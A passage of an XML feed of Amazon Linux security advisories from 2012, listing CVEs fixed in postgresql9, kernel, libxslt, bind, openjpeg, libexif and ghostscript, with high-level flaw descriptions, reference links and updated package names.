</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3480" title="" id="CVE-2012-3480" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1208.html" title="" id="RHSA-2012:1208" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-static" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.80.42.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.42.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/glibc-utils-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.80.42.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.80.42.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-121</id><title>Amazon Linux - ALAS-2012-121: medium priority package update for postgresql9</title><issued date="2012-09-04 10:23:00" /><updated date="2014-09-14 16:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3488:
It was found that the optional PostgreSQL xml2 contrib module allowed local files and remote URLs to be read and written to with the privileges of the database server when parsing Extensible Stylesheet Language Transformations (XSLT). An unprivileged database user could use this flaw to read and write to local files (such as the database's configuration files) and remote URLs they would otherwise not have access to by issuing a specially-crafted SQL query.
849172:
CVE-2012-3488 postgresql (xml2 contrib module): XXE by applying XSL stylesheet to the document
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3488" title="" id="CVE-2012-3488" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql9-devel" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.1.5-1.23.amzn1.i686.rpm</filename></package><package 
name="postgresql9-libs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.1.5-1.23.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-server" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.1.5-1.23.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" 
version="9.1.5" release="1.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.1.5-1.23.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-122</id><title>Amazon Linux - ALAS-2012-122: medium priority package update for kernel</title><issued date="2012-09-10 17:56:00" /><updated date="2014-09-14 16:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3520:
850449:
CVE-2012-3520 kernel: af_netlink: invalid handling of SCM_CREDENTIALS passing
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3520" title="" id="CVE-2012-3520" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.28" release="45.63.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.28-45.63.amzn1.noarch.rpm</filename></package><package name="kernel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.63.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.28-45.63.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.28-45.63.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.28" release="45.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.28-45.63.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-123</id><title>Amazon Linux - ALAS-2012-123: important priority package update for libxslt</title><issued date="2012-09-22 21:33:00" /><updated date="2014-09-14 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2871:
libxml2 2.9.0-rc1 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly support a cast of an unspecified variable during handling of XSL transforms, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document, related to the _xmlNs data structure in include/libxml/tree.h.
A heap-based buffer overflow flaw was found in the way libxslt applied templates to nodes selected by certain namespaces. An attacker could use this flaw to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
852935:
CVE-2012-2871 libxslt: Heap-buffer overflow caused by bad cast in XSL transforms
CVE-2012-2870:
libxslt 1.1.26 and earlier, as used in Google Chrome before 21.0.1180.89, does not properly manage memory, which might allow remote attackers to cause a denial of service (application crash) via a crafted XSLT expression that is not properly identified during XPath navigation, related to (1) the xsltCompileLocationPathPattern function in libxslt/pattern.c and (2) the xsltGenerateIdFunction function in libxslt/functions.c.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
852937:
CVE-2012-2870 libxslt: Use-after-free when processing an invalid XPath expression
CVE-2012-2825:
The XSL implementation in Google Chrome before 20.0.1132.43 allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
835982:
CVE-2012-2825 libxslt: DoS when reading unexpected DTD nodes in XSLT
CVE-2011-3970:
libxslt, as used in Google Chrome before 17.0.963.46, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.
Several denial of service flaws were found in libxslt. An attacker could use these flaws to create a malicious XSL file that, when used by an application linked against libxslt to perform an XSL transformation, could cause the application to crash.
788826:
CVE-2011-3970 libxslt: Out-of-bounds read when parsing certain patterns
CVE-2011-1202:
The xsltGenerateIdFunction function in functions.c in libxslt 1.1.26 and earlier, as used in Google Chrome before 10.0.648.127 and other products, allows remote attackers to obtain potentially sensitive information about heap memory addresses via an XML document containing a call to the XSLT generate-id XPath function.
An information leak could occur if an application using libxslt processed an untrusted XPath expression, or used a malicious XSL file to perform an XSL transformation. If combined with other flaws, this leak could possibly help an attacker bypass intended memory corruption protections.
A flaw was found in the Firefox XSLT generate-id() function. This function returned the memory address of an object in memory, which could possibly be used by attackers to bypass address randomization protections.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1202" title="" id="CVE-2011-1202" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3970" title="" id="CVE-2011-3970" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2825" title="" id="CVE-2012-2825" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2870" title="" id="CVE-2012-2870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2871" title="" id="CVE-2012-2871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1265.html" title="" id="RHSA-2012:1265" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxslt-python" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-python-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-devel-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.26" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/libxslt-debuginfo-1.1.26-2.7.amzn1.i686.rpm</filename></package><package name="libxslt-devel" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-devel-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt-debuginfo" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-debuginfo-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt-python" version="1.1.26" release="2.7.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libxslt-python-1.1.26-2.7.amzn1.x86_64.rpm</filename></package><package name="libxslt" version="1.1.26" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxslt-1.1.26-2.7.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-124</id><title>Amazon Linux - ALAS-2012-124: important priority package update for bind</title><issued date="2012-09-22 21:34:00" /><updated date="2014-09-14 16:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4244:
ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
A flaw was found in the way BIND handled resource records with a large RDATA value. A malicious owner of a DNS domain could use this flaw to create specially-crafted DNS resource records that would cause a recursive resolver or secondary server to exit unexpectedly with an assertion failure.
856754:
CVE-2012-4244 bind: specially crafted resource record causes named to exit
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4244" title="" id="CVE-2012-4244" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1268.html" title="" id="RHSA-2012:1268" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.24.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" 
release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.24.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-125</id><title>Amazon Linux - ALAS-2012-125: important priority package update for openjpeg</title><issued date="2012-09-22 21:35:00" /><updated date="2014-09-14 16:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3535:
It was found that OpenJPEG failed to sanity-check an image header field before using it. A remote attacker could provide a specially-crafted image file that could cause an application linked against OpenJPEG to crash or, possibly, execute arbitrary code.
Heap-based buffer overflow in OpenJPEG 1.5.0 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted JPEG2000 file.
842918:
CVE-2012-3535 openjpeg: heap-based buffer overflow when decoding jpeg2000 files
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3535" title="" id="CVE-2012-3535" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1283.html" title="" id="RHSA-2012:1283" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openjpeg-devel" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="9.6.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-9.6.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-9.6.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="9.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-9.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-126</id><title>Amazon Linux - ALAS-2012-126: medium priority package update for libexif</title><issued date="2012-09-22 21:36:00" /><updated date="2014-09-14 17:26:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2841:
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Integer underflow in the exif_entry_get_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) 0.6.20 might allow remote attackers to execute arbitrary code via vectors involving a crafted buffer-size parameter during the formatting of an EXIF tag, leading to a heap-based buffer overflow.
839189:
CVE-2012-2841 libexif: "exif_entry_get_value()" integer underflow
CVE-2012-2840:
Off-by-one error in the exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839188:
CVE-2012-2840 libexif: "exif_convert_utf16_to_utf8()" off-by-one
CVE-2012-2837:
The mnote_olympus_entry_get_value function in olympus/mnote-olympus-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (divide-by-zero error) via an image with crafted EXIF tags that are not properly handled during the formatting of EXIF maker note tags.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839185:
CVE-2012-2837 libexif: "mnote_olympus_entry_get_value()" division by zero
CVE-2012-2836:
The exif_data_load_data function in exif-data.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839184:
CVE-2012-2836 libexif: "exif_data_load_data()" heap-based out-of-bounds array read
CVE-2012-2814:
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
Buffer overflow in the exif_entry_format_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) 0.6.20 allows remote attackers to cause a denial of service or possibly execute arbitrary code via crafted EXIF tags in an image.
839183:
CVE-2012-2814 libexif: "exif_entry_format_value()" buffer overflow
CVE-2012-2813:
The exif_convert_utf16_to_utf8 function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839182:
CVE-2012-2813 libexif: "exif_convert_utf16_to_utf8()" heap-based out-of-bounds array read
CVE-2012-2812:
The exif_entry_get_value function in exif-entry.c in the EXIF Tag Parsing Library (aka libexif) before 0.6.21 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly obtain sensitive information from process memory via crafted EXIF tags in an image.
Multiple flaws were found in the way libexif processed Exif tags. An attacker could create a specially-crafted image file that, when opened in an application linked against libexif, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
839203:
CVE-2012-2812 libexif: "exif_entry_get_value()" heap-based out-of-bounds array read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2812" title="" id="CVE-2012-2812" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2813" title="" id="CVE-2012-2813" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2814" title="" id="CVE-2012-2814" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2836" title="" id="CVE-2012-2836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2837" title="" id="CVE-2012-2837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2840" title="" id="CVE-2012-2840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2841" title="" id="CVE-2012-2841" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1255.html" title="" id="RHSA-2012:1255" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libexif-debuginfo" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-debuginfo-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="5.6.amzn1" epoch="0" arch="i686"><filename>Packages/libexif-devel-0.6.21-5.6.amzn1.i686.rpm</filename></package><package name="libexif-devel" version="0.6.21" release="5.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-devel-0.6.21-5.6.amzn1.x86_64.rpm</filename></package><package name="libexif" version="0.6.21" release="5.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libexif-0.6.21-5.6.amzn1.x86_64.rpm</filename></package><package name="libexif-debuginfo" version="0.6.21" release="5.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libexif-debuginfo-0.6.21-5.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-127</id><title>Amazon Linux - ALAS-2012-127: medium priority package update for ghostscript</title><issued date="2012-09-22 21:37:00" /><updated date="2014-09-14 17:04:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4405:
Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (icclib), as used in Ghostscript 9.06 and Argyll Color Management System, allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted (1) PostScript or (2) PDF file with embedded images, which triggers a heap-based buffer overflow. NOTE: this issue is also described as an array index error.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in Ghostscript's International Color Consortium Format library (icclib). An attacker could create a specially-crafted PostScript or PDF file with embedded images that would cause Ghostscript to crash or, potentially, execute arbitrary code with the privileges of the user running Ghostscript.
854227:
CVE-2012-4405 ghostscript, argyllcms: Array index error leading to heap-based buffer OOB write
